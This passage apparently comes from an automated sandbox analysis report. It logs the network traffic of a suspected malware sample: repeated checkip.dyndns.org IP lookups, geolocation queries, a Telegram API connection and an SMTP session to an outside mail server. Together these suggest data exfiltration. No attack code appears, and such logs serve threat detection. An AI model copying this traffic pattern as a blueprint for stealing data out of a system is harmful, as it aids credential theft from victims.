Oct 1, 2024 10:55:29.102217913 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:29.102375031 CEST	80	49730	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:29.102451086 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:29.102566004 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:29.107476950 CEST	80	49730	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:31.730093002 CEST	80	49730	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:31.731801033 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:31.731836081 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:31.731915951 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:31.732192993 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:31.732206106 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:31.774622917 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.205549955 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:32.215790987 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:32.215821028 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:32.355365992 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:32.355596066 CEST	443	49734	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:32.355671883 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:32.392700911 CEST	49734	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:32.399878025 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.401034117 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.404994965 CEST	80	49730	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:32.405051947 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.405863047 CEST	80	49735	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:32.405927896 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.409847975 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:32.414658070 CEST	80	49735	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:33.043318987 CEST	80	49735	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:33.044899940 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.044929028 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.045037031 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.045264006 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.045278072 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.087685108 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.501395941 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.503220081 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.503271103 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.647840023 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.647937059 CEST	443	49736	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:33.648056984 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.648495913 CEST	49736	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:33.652781010 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.653779984 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.657982111 CEST	80	49735	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:33.658052921 CEST	49735	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.658629894 CEST	80	49738	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:33.658693075 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.658849001 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:33.663614988 CEST	80	49738	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:34.303560972 CEST	80	49738	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:34.304929972 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:34.304982901 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.305052996 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:34.305313110 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:34.305330992 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.352679968 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:34.764231920 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.765692949 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:34.765727043 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.896761894 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.896871090 CEST	443	49739	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:34.896924019 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:34.898972034 CEST	49739	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:35.169591904 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.171077013 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.176040888 CEST	80	49738	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:35.176063061 CEST	80	49742	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:35.176109076 CEST	49738	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.176142931 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.178710938 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.184899092 CEST	80	49742	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:35.806416035 CEST	80	49742	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:35.807504892 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:35.807538986 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:35.807677031 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:35.807909966 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:35.807919979 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:35.851099968 CEST	49712	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:35.852660894 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:36.292131901 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:36.293837070 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:36.293860912 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:36.431179047 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:36.431271076 CEST	443	49743	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:36.431482077 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:36.432276011 CEST	49743	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:36.443624973 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:36.448683023 CEST	80	49742	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:36.448820114 CEST	49742	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:36.452663898 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:36.452692032 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:36.453011036 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:36.453433037 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:36.453445911 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.072583914 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.072784901 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:37.075287104 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:37.075294971 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.075545073 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.081155062 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:37.123410940 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.314937115 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.315016985 CEST	443	49744	149.154.167.220	192.168.2.5
Oct 1, 2024 10:55:37.315099001 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:37.315570116 CEST	49744	443	192.168.2.5	149.154.167.220
Oct 1, 2024 10:55:42.551069975 CEST	49722	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:42.749882936 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:42.754782915 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:42.754895926 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:43.713464975 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:43.713819027 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:43.718833923 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:43.886593103 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:43.886831999 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:43.891765118 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.060343027 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.060802937 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.065609932 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.255949020 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.255976915 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.255986929 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.256041050 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.343219995 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.359153986 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.363945007 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.531580925 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.534852982 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.539622068 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.707087040 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.708296061 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.713181973 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.880956888 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:44.881345034 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:44.886199951 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.065654039 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.065944910 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.070739985 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.238300085 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.238626957 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.243407011 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.419131994 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.419400930 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.424278021 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.591739893 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.592520952 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.592588902 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.592664003 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.592726946 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:55:45.597317934 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.597378016 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.597557068 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:45.597599030 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:46.493738890 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:55:46.540162086 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:57:22.745493889 CEST	49745	587	192.168.2.5	75.102.58.14
Oct 1, 2024 10:57:22.750541925 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:57:22.918318987 CEST	587	49745	75.102.58.14	192.168.2.5
Oct 1, 2024 10:57:22.919169903 CEST	49745	587	192.168.2.5	75.102.58.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:54:59.317343950 CEST	60633	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:54:59.324086905 CEST	53	60633	1.1.1.1	192.168.2.5
Oct 1, 2024 10:55:00.346477985 CEST	56942	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:55:00.354070902 CEST	53	56942	1.1.1.1	192.168.2.5
Oct 1, 2024 10:55:36.444272995 CEST	57413	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:55:36.452115059 CEST	53	57413	1.1.1.1	192.168.2.5
Oct 1, 2024 10:55:42.719172955 CEST	50357	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:55:42.748959064 CEST	53	50357	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 10:54:59.317343950 CEST	192.168.2.5	1.1.1.1	0x98b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:00.346477985 CEST	192.168.2.5	1.1.1.1	0x1345	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:36.444272995 CEST	192.168.2.5	1.1.1.1	0x5b8d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:42.719172955 CEST	192.168.2.5	1.1.1.1	0x3238	Standard query (0)	mail.pymetal.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:54:59.324086905 CEST	1.1.1.1	192.168.2.5	0x98b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:00.354070902 CEST	1.1.1.1	192.168.2.5	0x1345	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:00.354070902 CEST	1.1.1.1	192.168.2.5	0x1345	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:36.452115059 CEST	1.1.1.1	192.168.2.5	0x5b8d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:42.748959064 CEST	1.1.1.1	192.168.2.5	0x3238	No error (0)	mail.pymetal.net		75.102.58.14	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:54:59.382452011 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:00.042814970 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:54:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a8d60149d6ccc2b9f862a3ecd0f558d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 10:55:00.069933891 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 10:55:00.255995035 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b27adea8048424020009ce25da822b7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 10:55:02.033912897 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 10:55:04.006131887 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:03 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 95d02c545963126052dc6d0df0b87b6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	193.122.6.168	80	7708	C:\Users\user\AppData\Roaming\AcEnrS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:04.653181076 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:19.270039082 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Tue, 01 Oct 2024 08:55:19 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: d771a6eed583317c1cae219d2e130466 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:04.741929054 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 10:55:16.176819086 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0173b54866a709cc07350df5331e5d54 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:16.797909021 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 10:55:24.710340023 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Tue, 01 Oct 2024 08:55:24 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: e62c1152ac7852e39a1f19dfb6bd4b31 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49726	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:24.724757910 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:28.482067108 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 84acc2bca924dddef30508e384f187bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49730	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:29.102566004 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
